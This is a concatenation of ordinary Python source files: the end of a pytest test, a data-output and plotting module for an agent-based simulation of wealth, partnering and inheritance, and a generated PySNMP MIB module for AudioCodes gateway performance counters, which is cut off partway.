npt.assert_allclose(vv, [[1.0, 2.0], [1.0, 2.0], [1.0, 2.0]])
npt.assert_allclose(tt, [[10.0, 10.0], [20.0, 20.0], [30.0, 30.0]])
@pytest.mark.skip("broken after with_ removal")
def test_cannot_input_theta_before_volume():
# GIVEN: freshly created IfgCalculator()
# WHEN: `with_theta` is called before volume input
# THEN: exception is raised
with pytest.raises(ValueError) as e:
IfgCalculator().with_theta([1.0, 2.0])
assert e.match(
"specific volume should be defined before using theta for temperature input"
)
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os
class Sink:
def write(self, key, obj):
raise Exception('Virtual function is not overridden')
def flush(self):
raise Exception('Virtual function is not overridden')
class CompositeSink(Sink):
def __init__(self, sinks):
self._sinks = sinks
def write(self, key, obj):
for sink in self._sinks:
sink.write(key, obj)
def flush(self):
for sink in self._sinks:
sink.flush()
class HDFSink(Sink):
def __init__(self, ctx, file_path):
self._file_path = file_path
self._data = {}
self._logger = ctx.logger
def write(self, name, df, reset_index=True):
self._data[name] = df.reset_index() if reset_index else df
def flush(self):
store = pd.HDFStore(self._file_path, complib='blosc', complevel=9)
for name, data in self._data.items():
self._logger.info("saving dataset to hdf store '%s'", name)
store[name] = data
store.close()
self._data = {}
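# Hypothetical usage sketch (the `ctx` object only needs a `.logger`
# attribute for HDFSink): frames are buffered under a name and persisted in
# one go on flush().
#
#   sink = HDFSink(ctx, 'results.h5')
#   sink.write('population', population_df)
#   sink.flush()  # writes every buffered frame to results.h5, then clears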
class CommonSink(Sink):
"""
The most general sink.
"""
def __init__(self, ctx, store):
self._ctx = ctx #model context
self._store = store
n_tick = int(ctx.ctrl.ticks)
self.n_agent = np.zeros(n_tick, int)
self.mean_age = np.zeros(n_tick)
self.n_female = np.zeros(n_tick, int)
self.skill_dist = np.zeros((5, n_tick), int)
self.mean_wealth = np.zeros(n_tick)
self.n_partnered = np.zeros(n_tick, int)
self.n_coupling = np.zeros(n_tick, int)
self.n_uncoupling = np.zeros(n_tick, int)
self.skill_dist_new = np.zeros((5, n_tick), int)
self.mean_savings = np.zeros(n_tick)
self.mean_interest = np.zeros(n_tick)
self.n_dying = np.zeros(n_tick, int)
self.mean_age_dying = np.zeros(n_tick)
self.n_baby = np.zeros(n_tick, int)
self.mean_age_mother = np.zeros(n_tick)
self.gini = np.zeros(n_tick)
self.gini_adult = np.zeros(n_tick)
self.gini_20_39 = np.zeros(n_tick)
self.gini_40_64 = np.zeros(n_tick)
self.gini_65p = np.zeros(n_tick)
self.direct_amount = np.zeros(n_tick)
self.n_direct = np.zeros(n_tick, int)
self.trust_amount = np.zeros(n_tick)
self.n_from_trust = np.zeros(n_tick, int)
self.max_age = 150
self.n_agent_by_age = np.zeros((n_tick, self.max_age), int)
self.n_female_by_age = np.zeros((n_tick, self.max_age), int)
self.mean_wealth_by_age = np.zeros((n_tick, self.max_age))
self.n_partnered_by_age = np.zeros((n_tick, self.max_age), int)
self.n_coupling_by_age = np.zeros((n_tick, self.max_age), int)
self.n_uncoupling_by_age = np.zeros((n_tick, self.max_age), int)
self.n_dying_by_age = np.zeros((n_tick, self.max_age), int)
self.n_baby_by_age = np.zeros((n_tick, self.max_age), int)
self.mean_savings_by_age = np.zeros((n_tick, self.max_age))
self.mean_interest_by_age = np.zeros((n_tick, self.max_age))
self.mean_children_by_age = np.zeros((n_tick, self.max_age))
self.n_female_0_children = np.zeros((n_tick, self.max_age), int)
self.n_female_1_children = np.zeros((n_tick, self.max_age), int)
self.n_female_2_children = np.zeros((n_tick, self.max_age), int)
self.n_female_3p_children = np.zeros((n_tick, self.max_age), int)
self.direct_amount_by_age = np.zeros((n_tick, self.max_age))
self.n_direct_by_age = np.zeros((n_tick, self.max_age), int)
self.trust_amount_by_age = np.zeros((n_tick, self.max_age))
self.n_from_trust_by_age = np.zeros((n_tick, self.max_age), int)
self.tree = None
def write(self, tick, obj):
(age, female, skill, wealth, partner, coupling, uncoupling, parents,
savings, interest, dying, have_baby, boost, alive, direct_amount,
trust_amount, tree, trusts) = obj
self.n_agent[tick] = alive.sum()
self.mean_age[tick] = age[alive].mean()
self.n_female[tick] = female[alive].sum()
self.skill_dist[:, tick] = np.histogram(skill[alive], bins=list(range(6)))[0]
self.mean_wealth[tick] = wealth[alive].mean()
self.n_partnered[tick] = (partner >= 0).sum()
self.n_coupling[tick] = coupling.sum()
self.n_uncoupling[tick] = uncoupling.sum()
self.mean_savings[tick] = savings[alive].mean()
self.mean_interest[tick] = interest[alive].mean()
self.n_dying[tick] = dying.sum()
self.mean_age_dying[tick] = age[dying].mean()
self.n_baby[tick] = have_baby.sum()
self.mean_age_mother[tick] = age[have_baby].mean()
self.gini[tick] = gini(wealth[alive])
self.gini_adult[tick] = gini(wealth[alive & (age >= 20)])
self.gini_20_39[tick] = gini(wealth[alive & (age >= 20) & (age < 40)])
self.gini_40_64[tick] = gini(wealth[alive & (age >= 40) & (age < 65)])
        self.gini_65p[tick] = gini(wealth[alive & (age >= 65)])
self.direct_amount[tick] = direct_amount.sum()
self.n_direct[tick] = (direct_amount > 0).sum()
self.trust_amount[tick] = trust_amount.sum()
self.n_from_trust[tick] = (trust_amount > 0).sum()
bins = list(range(self.max_age+1))
self.n_agent_by_age[tick, :] = np.histogram(age[alive], bins=bins)[0]
self.n_female_by_age[tick, :] = np.histogram(age[alive & female], bins=bins)[0]
self.mean_wealth_by_age[tick, :] = mean_by(wealth[alive], age[alive], 0, self.max_age)
self.n_partnered_by_age[tick, :] = np.histogram(age[partner >= 0], bins=bins)[0]
self.n_coupling_by_age[tick, :] = np.histogram(age[coupling], bins=bins)[0]
self.n_uncoupling_by_age[tick, :] = np.histogram(age[uncoupling], bins=bins)[0]
self.n_dying_by_age[tick, :] = np.histogram(age[dying], bins=bins)[0]
self.n_baby_by_age[tick, :] = np.histogram(age[have_baby], bins=bins)[0]
self.mean_savings_by_age[tick, :] = mean_by(savings[alive], age[alive], 0, self.max_age)
self.mean_interest_by_age[tick, :] = mean_by(interest[alive], age[alive], 0, self.max_age)
n_children = np.histogram(parents.ravel(), bins=list(range(len(age)+1)))[0]
self.mean_children_by_age[tick, :] = mean_by(n_children[alive], age[alive], 0, self.max_age)
self.n_female_0_children[tick, :] = np.histogram(age[alive & female & (n_children == 0)], bins=bins)[0]
self.n_female_1_children[tick, :] = np.histogram(age[alive & female & (n_children == 1)], bins=bins)[0]
self.n_female_2_children[tick, :] = np.histogram(age[alive & female & (n_children == 2)], bins=bins)[0]
self.n_female_3p_children[tick, :] = np.histogram(age[alive & female & (n_children >= 3)], bins=bins)[0]
self.direct_amount_by_age[tick, :] = sum_by(direct_amount, age, 0, self.max_age)
self.n_direct_by_age[tick, :] = np.histogram(age[direct_amount > 0], bins=bins)[0]
self.trust_amount_by_age[tick, :] = sum_by(trust_amount, age, 0, self.max_age)
self.n_from_trust_by_age[tick, :] = np.histogram(age[trust_amount > 0], bins=bins)[0]
self.tree = tree
def flush(self):
sink = self._store
ticks = pd.Series(list(range(len(self.n_agent))), name='tick')
data = pd.DataFrame({
'n_agent': self.n_agent,
'mean_age': self.mean_age,
'n_female': self.n_female,
'mean_wealth': self.mean_wealth,
'n_partnered': self.n_partnered,
'n_coupling': self.n_coupling,
'n_uncoupling': self.n_uncoupling,
'mean_savings': self.mean_savings,
'mean_interest': self.mean_interest,
'n_dying': self.n_dying,
'mean_age_dying': self.mean_age_dying,
'n_baby': self.n_baby,
'mean_age_mother': self.mean_age_mother,
'gini': self.gini,
'gini_adult': self.gini_adult,
'gini_20_39': self.gini_20_39,
'gini_40_64': self.gini_40_64,
'gini_65p': self.gini_65p,
'direct_amount': self.direct_amount,
'n_direct': self.n_direct,
'trust_amount': self.trust_amount,
'n_from_trust': self.n_from_trust,
}, index=ticks)
data = data[['n_agent', 'mean_age', 'n_female', 'mean_wealth',
'n_partnered', 'n_coupling', 'n_uncoupling', 'mean_savings',
'mean_interest', 'n_dying', 'mean_age_dying', 'n_baby',
'mean_age_mother', 'gini', 'gini_adult', 'gini_20_39',
'gini_40_64', 'gini_65p', 'direct_amount', 'n_direct',
'trust_amount', 'n_from_trust']]
sink.write('data', data)
skill_label = ['skill_{}'.format(i) for i in range(5)]
skill_dist = pd.DataFrame(self.skill_dist.T, columns=skill_label, index=ticks)
sink.write('skill_dist', skill_dist)
ticks_by_age = np.outer(ticks.values, np.ones(self.max_age, int))
age_by_age = np.outer(np.ones(len(ticks), int), np.arange(self.max_age, dtype=int))
by_age = pd.DataFrame({
'tick': ticks_by_age.ravel(),
'age': age_by_age.ravel(),
'n_agent': self.n_agent_by_age.ravel(),
'n_female': self.n_female_by_age.ravel(),
'mean_wealth': self.mean_wealth_by_age.ravel(),
'n_partnered': self.n_partnered_by_age.ravel(),
'n_coupling': self.n_coupling_by_age.ravel(),
'n_uncoupling': self.n_uncoupling_by_age.ravel(),
'n_dying': self.n_dying_by_age.ravel(),
'n_baby': self.n_baby_by_age.ravel(),
'mean_savings': self.mean_savings_by_age.ravel(),
'mean_interest': self.mean_interest_by_age.ravel(),
'mean_children': self.mean_children_by_age.ravel(),
'n_female_0_children': self.n_female_0_children.ravel(),
'n_female_1_children': self.n_female_1_children.ravel(),
'n_female_2_children': self.n_female_2_children.ravel(),
'n_female_3p_children': self.n_female_3p_children.ravel(),
'direct_amount': self.direct_amount_by_age.ravel(),
'n_direct': self.n_direct_by_age.ravel(),
'trust_amount': self.trust_amount_by_age.ravel(),
'n_from_trust': self.n_from_trust_by_age.ravel(),
})
by_age = by_age[['tick', 'age', 'n_agent', 'n_female', 'mean_wealth',
'n_partnered', 'n_coupling', 'n_uncoupling',
'n_dying', 'n_baby', 'mean_savings', 'mean_interest',
'mean_children', 'n_female_0_children',
'n_female_1_children', 'n_female_2_children',
'n_female_3p_children', 'direct_amount', 'n_direct',
'trust_amount', 'n_from_trust']]
sink.write('by_age', by_age, reset_index=False)
df_tree = pd.DataFrame({
'ancestor': np.hstack([t.row for t in self.tree]),
'descendant': np.hstack([t.col for t in self.tree]),
'generations': np.hstack([(i+1)*np.ones(len(t.row), int)
for i, t in enumerate(self.tree)])
})
df_tree = df_tree[['descendant', 'ancestor', 'generations']]
sink.write('tree', df_tree, reset_index=False)
def mean_by(values, group, min_val, max_val):
result = np.zeros(max_val - min_val) + np.nan
series = pd.Series(values).groupby(group).mean()
series = series[(series.index.values >= min_val) &
(series.index.values < max_val)]
result[series.index.values - min_val] = series.values
return result
def sum_by(values, group, min_val, max_val):
dtype = int if values.dtype == bool else values.dtype
result = np.zeros(max_val - min_val, dtype=dtype)
series = pd.Series(values).groupby(group).sum()
series = series[(series.index.values >= min_val) &
(series.index.values < max_val)]
result[series.index.values - min_val] = series.values
return result
def gini(wealth):
return 1.0 - (np.sort(wealth).cumsum() / wealth.sum()).sum() / (0.5 * len(wealth))
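# A minimal usage sketch (not called anywhere) of the aggregation helpers above:
# mean_by/sum_by collapse a value array onto integer groups (here, ages) as a
# fixed-length vector, and gini approximates the Gini coefficient of a wealth
# distribution. The numbers are made up for illustration.
def _demo_aggregations():
    age = np.array([20, 20, 30, 30, 30, 40])
    wealth = np.array([10.0, 30.0, 5.0, 5.0, 20.0, 100.0])
    mean_wealth_by_age = mean_by(wealth, age, 0, 150)    # NaN except at indices 20, 30 and 40
    total_wealth_by_age = sum_by(wealth, age, 0, 150)    # zeros except at indices 20, 30 and 40
    return mean_wealth_by_age, total_wealth_by_age, gini(wealth)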
class IndividualSink(Sink):
def __init__(self, ctx, store):
self._ctx = ctx #model context
self._store = store
self.n_tick = int(ctx.ctrl.ticks)
self.n_agent_0 = int(ctx.ctrl.agents)
self.n_store = self.n_agent_0 * 2 # Allow for population growth
self.age = np.zeros((self.n_tick, self.n_store), int)
self.female = np.zeros((self.n_tick, self.n_store), bool)
self.skill = np.zeros((self.n_tick, self.n_store), int)
self.wealth = np.zeros((self.n_tick, self.n_store), float)
self.partner = np.zeros((self.n_tick, self.n_store), int)
self.coupling = np.zeros((self.n_tick, self.n_store), bool)
self.uncoupling = np.zeros((self.n_tick, self.n_store), bool)
self.mother = np.zeros((self.n_tick, self.n_store), int)
self.father = np.zeros((self.n_tick, self.n_store), int)
self.savings = np.zeros((self.n_tick, self.n_store), float)
self.interest = np.zeros((self.n_tick, self.n_store), float)
self.dying = np.zeros((self.n_tick, self.n_store), bool)
self.have_baby = np.zeros((self.n_tick, self.n_store), bool)
self.boost = np.zeros((self.n_tick, self.n_store), float)
self.alive = np.zeros((self.n_tick, self.n_store), bool)
self.direct_amount = np.zeros((self.n_tick, self.n_store), float)
self.trust_amount = np.zeros((self.n_tick, self.n_store), float)
def write(self, tick, obj):
(age, female, skill, wealth, partner, coupling, uncoupling, parents,
savings, interest, dying, have_baby, boost, alive, direct_amount,
trust_amount, tree, trusts) = obj
n_write = len(age)
if n_write > self.n_store:
# Need more memory
n_new = int(0.5 * self.n_agent_0)
for attr in ('age', 'female', 'skill', 'wealth', 'partner',
'coupling', 'uncoupling', 'mother', 'father',
'savings', 'interest', 'dying', 'have_baby',
'boost', 'alive', 'direct_amount', 'trust_amount'):
old = getattr(self, attr)
extra = np.zeros((self.n_tick, n_new), dtype=old.dtype)
new = np.hstack((old, extra))
setattr(self, attr, new)
self.n_store += n_new
self.age[tick, :n_write] = age
self.female[tick, :n_write] = female
self.skill[tick, :n_write] = skill
self.wealth[tick, :n_write] = wealth
self.partner[tick, :n_write] = partner
self.coupling[tick, :n_write] = coupling
self.uncoupling[tick, :n_write] = uncoupling
self.mother[tick, :n_write] = parents[:, 0]
self.father[tick, :n_write] = parents[:, 1]
self.savings[tick, :n_write] = savings
self.interest[tick, :n_write] = interest
self.dying[tick, :n_write] = dying
self.have_baby[tick, :n_write] = have_baby
self.boost[tick, :n_write] = boost
self.alive[tick, :n_write] = alive
self.direct_amount[tick, :n_write] = direct_amount
self.trust_amount[tick, :n_write] = trust_amount
def flush(self):
sink = self._store
# Trim to correct size
n_agent = np.where(self.alive.sum(axis=0) > 0)[0][-1]
for attr in ('age', 'female', 'skill', 'wealth', 'partner',
'coupling', 'uncoupling', 'mother', 'father',
'savings', 'interest', 'dying', 'have_baby',
'boost', 'alive', 'direct_amount', 'trust_amount'):
old = getattr(self, attr)
new = old[:, :n_agent]
setattr(self, attr, new)
ticks = pd.Series(list(range(self.n_tick)), name='tick')
ticks_by_agents = np.outer(ticks.values, np.ones(n_agent, int))
agents_by_agents = np.outer(np.ones(len(ticks), int), np.arange(n_agent, dtype=int))
history = pd.DataFrame({
'tick': ticks_by_agents.ravel(),
'agent': agents_by_agents.ravel(),
'age': self.age.ravel(),
'female': self.female.ravel(),
'skill': self.skill.ravel(),
'wealth': self.wealth.ravel(),
'partner': self.partner.ravel(),
'coupling': self.coupling.ravel(),
'uncoupling': self.uncoupling.ravel(),
'mother': self.mother.ravel(),
'father': self.father.ravel(),
'savings': self.savings.ravel(),
'interest': self.interest.ravel(),
'dying': self.dying.ravel(),
'have_baby': self.have_baby.ravel(),
'boost': self.boost.ravel(),
'alive': self.alive.ravel(),
'direct_amount': self.direct_amount.ravel(),
'trust_amount': self.trust_amount.ravel(),
})
history = history[['tick', 'agent', 'age', 'female', 'skill',
'wealth', 'partner', 'coupling', 'uncoupling',
'mother', 'father', 'savings',
'interest', 'dying', 'have_baby', 'boost',
'alive', 'direct_amount', 'trust_amount']]
sink.write('history', history, reset_index=False)
class TrustsSink(Sink):
def __init__(self, ctx, store):
self._ctx = ctx #model context
self._store = store
self.n_tick = int(ctx.ctrl.ticks)
self.n_agent_0 = int(ctx.ctrl.agents)
self.n_store = 2 * self.n_agent_0 # Allow two trusts per initial agent
self.amount = np.zeros((self.n_tick, self.n_store), float)
self.initial = np.zeros((self.n_tick, self.n_store), float)
self.generations = np.zeros((self.n_tick, self.n_store), int)
self.ancestor = np.zeros((self.n_tick, self.n_store), int)
self.active = np.zeros((self.n_tick, self.n_store), bool)
self.n_write = 0
def write(self, tick, obj):
(age, female, skill, wealth, partner, coupling, uncoupling, parents,
savings, interest, dying, have_baby, boost, alive, direct_amount,
trust_amount, tree, trusts) = obj
n_write = len(trusts['amount'])
if n_write > self.n_store:
# Need more memory
n_new = int(0.5 * self.n_agent_0)
for attr in ('amount', 'initial', 'generations', 'ancestor', 'active'):
old = getattr(self, attr)
extra = np.zeros((self.n_tick, n_new), dtype=old.dtype)
new = np.hstack((old, extra))
setattr(self, attr, new)
self.n_store += n_new
self.amount[tick, :n_write] = trusts['amount']
self.initial[tick, :n_write] = trusts['initial']
self.generations[tick, :n_write] = trusts['generations']
self.ancestor[tick, :n_write] = trusts['ancestor']
self.active[tick, :n_write] = trusts['active']
self.n_write = n_write
def flush(self):
sink = self._store
# Trim to correct size
for attr in ('amount', 'initial', 'generations', 'ancestor', 'active'):
old = getattr(self, attr)
new = old[:, :self.n_write]
setattr(self, attr, new)
ticks = pd.Series(list(range(self.n_tick)), name='tick')
ticks_by_trusts = np.outer(ticks.values, np.ones(self.n_write, int))
trusts_by_trusts = np.outer(np.ones(len(ticks), int), np.arange(self.n_write, dtype=int))
trusts = pd.DataFrame({
'tick': ticks_by_trusts.ravel(),
'trust': trusts_by_trusts.ravel(),
'amount': self.amount.ravel(),
'initial': self.initial.ravel(),
'generations': self.generations.ravel(),
'ancestor': self.ancestor.ravel(),
'active': self.active.ravel(),
})
trusts = trusts[['tick', 'trust', 'amount', 'initial', 'generations',
'ancestor', 'active']]
sink.write('trusts', trusts, reset_index=False)
def plot_history(data, agent, agent_numbers=True):
if isinstance(data, str):
data = pd.HDFStore(os.path.join(data, 'output', 'output.h5'))
history = data.history
life = history[history.agent == agent].set_index('tick')
life.index = 2016 + life.index
plt.figure(figsize=(10, 5))
plt.axes(position=[0.08, 0.1, 0.90, 0.87])
ymax = 1.05*life.wealth.max() / 1000.0
ymax = ymax if ymax > 0 else 1.0
plt.fill_between(life.index, 0, ymax, color='black', alpha=0.2, where=(life.dying | ~life.alive))
partner_list = np.unique(life.partner[(life.partner >= 0) & life.alive])
    # The agent's babies will be combined with the partner(s)' babies
baby_series = life.have_baby.copy()
for partner in partner_list:
in_relationship = (life.partner == partner).values
partner_life = history[history.agent == partner].set_index('tick')
partner_life.index = 2016 + partner_life.index
baby_series = baby_series | (in_relationship & partner_life.have_baby)
# Extend out a year to include the final months of the relationship
in_relationship[1:] = (~partner_life.dying[:-1] & in_relationship[:-1]) | in_relationship[1:]
in_relationship = in_relationship & (life.alive | life.dying)
plt.fill_between(life.index, 0, ymax, color='magenta', alpha=0.1, where=in_relationship)
for coupling in life.index[life.coupling]:
plt.plot([coupling, coupling], [0, ymax], color='red', linestyle=':', linewidth=1.5)
label = 'partner'
if agent_numbers:
number = life.partner.loc[coupling]
number = number if number >= 0 else '?'
label = '{} ({})'.format(label, number)
plt.text(coupling+0.3, 0.85*ymax, label, rotation=90, color='red')
for uncoupling in life.index[life.uncoupling]:
plt.plot([uncoupling, uncoupling], [0, ymax], color='red', linestyle=':', linewidth=1.5)
label = 'separated'
if agent_numbers:
number = life.partner.loc[uncoupling] if uncoupling > 0 else -1
number = number if number >= 0 else '?'
label = '{} ({})'.format(label, number)
plt.text(uncoupling+0.3, 0.85*ymax, label, rotation=90, color='red')
for have_baby in life.index[baby_series]:
plt.plot([have_baby, have_baby], [0, ymax], color='green', linestyle='--', linewidth=1.5)
label = 'baby'
if agent_numbers:
baby = history.agent[
((history.mother == agent) | (history.father == agent)) &
(history.age == 0) & history.alive &
(history.tick == (have_baby-life.index[0]))].iloc[0]
label = '{} ({})'.format(label, baby)
plt.text(have_baby+0.3, 0.4*ymax, label, rotation=90, color='green')
plt.plot(life.wealth[life.alive & ~life.dying] / 1000.0, linewidth=2.0, alpha=0.7)
plt.xlim(life.index[0], life.index[-1])
plt.ylim(0, ymax)
plt.text(1+life.index[life.alive][0], 0.03*ymax, 'Age:')
for age in range(10, 200, 10):
this_age = (life.age == age)
if np.any(this_age):
year = life.index[this_age][0]
tick = year - life.index[0]
if tick >= 8:
plt.text(year, 0.03*ymax, age, ha='center')
plt.plot([year, year], [0, 0.022*ymax], color='black')
label = 'Female' if np.any(life.female) else 'Male'
if agent_numbers:
label = '{}: {}'.format(agent, label)
plt.text(2+life.index[0], 0.95*ymax, label)
plt.xlabel('Year')
plt.ylabel(u'Total wealth (£1000s)')
plt.show()
def get_history(data, agent):
if isinstance(data, str):
data = pd.HDFStore(os.path.join(data, 'output', 'output.h5'))
events = []
history = data.history
life = history[history.agent == agent].set_index('tick')
mother = life.mother[life.alive].max()
father = life.father[life.alive].max()
born = (life.age == 0) & life.alive
if np.any(born):
tick = np.where(born)[0][0]
events.append([tick, 'born', None])
else:
tick = 0
events.append([tick, 'initial age', life.age.loc[0]])
events.append([tick, 'mother', mother])
events.append([tick, 'father', father])
if np.any(life.dying):
events.append([np.where(life.dying)[0][0], 'died', None])
if np.any(life.coupling):
for t in np.where(life.coupling)[0]:
if life.uncoupling.loc[t]:
# Damn, that was too fast to record
events.append([t, 'coupled', None])
else:
events.append([t, 'coupled', life.partner.loc[t]])
if life.alive.loc[0] and (life.partner.loc[0] >= 0) and not life.coupling.loc[0]:
events.append([0, 'initial partner', life.partner.loc[0]])
if np.any(life.uncoupling):
for t in np.where(life.uncoupling)[0]:
if life.coupling.loc[t]:
# Too fast
events.append([t, 'uncoupled', None])
else:
events.append([t, 'uncoupled', life.partner.loc[t-1]])
babies = life.have_baby
widows = pd.Series(np.zeros(len(life)))
for partner in life.partner[(life.partner >= 0) & life.alive].unique():
partner_life = history[(history.agent == partner) & (history.partner == agent)].set_index('tick')
babies[partner_life.index] += partner_life.have_baby.values
widows[partner_life.index] += partner_life.dying.values
for tick in np.where(babies.values)[0]:
baby = history.agent[((history.mother == agent) | (history.father == agent)) &
(history.age == 0) & history.alive & (history.tick == tick)].iloc[0]
events.append([tick, 'baby', baby])
for tick in np.where(widows.values)[0]:
events.append([tick, 'widowed', None])
for child in history.agent[((history.mother == agent) | (history.father == agent)) &
(history.age > 0) & (history.tick == 0)].values:
events.append([0, 'existing child', child])
return sorted(events, key=lambda x: x[0])
def generation_correlation(result, age, measure):
agent = result.history[(result.history.age == age) & (result.history.tick > (result.history.tick.max()-10)) & result.history.alive & ~result.history.dying].agent.values
measure = result.history[(result.history.age == age) & result.history.alive & ~result.history.dying].set_index('agent')[measure]
tree = result.tree[result.tree.descendant.isin(agent) & result.tree.ancestor.isin(measure.index)]
gencor = []
for generations in range(1, tree.generations.max()+1):
tree_cut = tree[tree.generations == generations]
measure_ancestor = measure.loc[tree_cut.ancestor].groupby(tree_cut.descendant.values).mean()
measure_descendant = measure.loc[measure_ancestor.index]
gencor.append(np.corrcoef(measure_ancestor, measure_descendant)[0, 1])
return gencor
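# A hedged usage sketch for generation_correlation: `result` is a hypothetical
# object exposing the 'history' and 'tree' DataFrames written by the sinks above
# (e.g. read back from the HDF store). It plots the correlation of wealth at age
# 40 between descendants and their ancestors, by generation gap.
def _demo_generation_correlation(result):
    gencor = generation_correlation(result, 40, 'wealth')
    plt.plot(range(1, len(gencor) + 1), gencor, marker='o')
    plt.xlabel('Generations between ancestor and descendant')
    plt.ylabel('Correlation of wealth at age 40')
    plt.show()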
|
#
# PySNMP MIB module AcPerfMediaGateway (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/AcPerfMediaGateway
# Produced by pysmi-0.3.4 at Wed May 1 11:33:09 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Integer32, Counter32, ObjectIdentity, IpAddress, MibIdentifier, ModuleIdentity, Gauge32, Unsigned32, iso, enterprises, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Integer32", "Counter32", "ObjectIdentity", "IpAddress", "MibIdentifier", "ModuleIdentity", "Gauge32", "Unsigned32", "iso", "enterprises", "TimeTicks")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
audioCodes = MibIdentifier((1, 3, 6, 1, 4, 1, 5003))
acRegistrations = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 7))
acGeneric = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 8))
acProducts = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 9))
acPerformance = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10))
acPerfMediaGateway = ModuleIdentity((1, 3, 6, 1, 4, 1, 5003, 10, 1))
acPerfMediaGateway.setRevisions(('2003-11-20 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: acPerfMediaGateway.setRevisionsDescriptions(('Version 4.4. November 20, 2003. Made these changes: o Initial revision',))
if mibBuilder.loadTexts: acPerfMediaGateway.setLastUpdated('200407121502Z')
if mibBuilder.loadTexts: acPerfMediaGateway.setOrganization('AudioCodes Ltd')
if mibBuilder.loadTexts: acPerfMediaGateway.setContactInfo('Postal: Support AudioCodes LTD 1 Hayarden Street Airport City Lod, ISRAEL 70151 Tel: 972-3-9764000 Fax: 972-3-9764040 Email: support@audiocodes.com Web: www.audiocodes.com')
if mibBuilder.loadTexts: acPerfMediaGateway.setDescription('This MIB defines the enterprise-specific objects needed to support performance management of the AudioCodes product. Performance measurements are grouped into the following MIB trees: acPerfCp - performance measurements related to the control protocol acPerfRtp - performance measurements related to RTP streams acPerfSystem - performance measurements related to network element as a whole')
acPerfCp = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1))
acPerfCpNumDupsForCompletedTransactions = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpNumDupsForCompletedTransactions.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpNumDupsForCompletedTransactions.setDescription('The number of times a duplicate transaction request was received after the initial transaction had already been completed. In this case, the gateway resends the response for this transaction. Products: All Capabilities: All')
acPerfCpNumDupsForOutstandingTransactions = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpNumDupsForOutstandingTransactions.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpNumDupsForOutstandingTransactions.setDescription('The number of times a duplicate transaction request was received while the initial transaction was outstanding, that is, still in progress. In this case, the gateway ignores the duplicate request. Products: All Capabilities: All')
acPerfCpMessageSendSuccesses = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageSendSuccesses.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageSendSuccesses.setDescription("Number of times there was a success in sending a call control (H.248) message. Call control messages are sent using the system's socket library. This counter tracks successes in using the local socket services. It does not track successes in end-to-end message transfer between the gateway and the call agent. Products: All Capabilities: All")
acPerfCpMessageSendErrors = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageSendErrors.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageSendErrors.setDescription("Number of times there was a failure in sending a call control (H.248) message. The message is sent via a datagram using the system's socket library. Normally a failure on a socket send operation would be attributed to an internal system problem. Products: All Capabilities: All")
acPerfCpMessageReceiveSuccesses = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageReceiveSuccesses.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageReceiveSuccesses.setDescription("Number of times there was a success in receiving a call control (H.248) message. Call control messages are received using the system's socket library. This counter tracks successes in using the local socket services. It does not track successes in end-to-end message transfer between the gateway and the call agent. Products: All Capabilities: All")
acPerfCpMessageReceiveErrors = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageReceiveErrors.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageReceiveErrors.setDescription("Number of times there was a failure in receiving a call control ( H.248) message. Call control messages are received using the system's socket library. A failure on the socket receive operation can be attributed to an internal system problem or with the call agent sending a message larger than what is supported by the gateway. Products: All Capabilities: All")
acPerfCpProtocolSyntaxErrors = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpProtocolSyntaxErrors.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpProtocolSyntaxErrors.setDescription('Number of syntax errors detected in incoming call control (H.248) messages. Products: All Capabilities: All')
acPerfCpMessageRetransmissions = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 8), Counter32()).setMaxAccess("readonly")
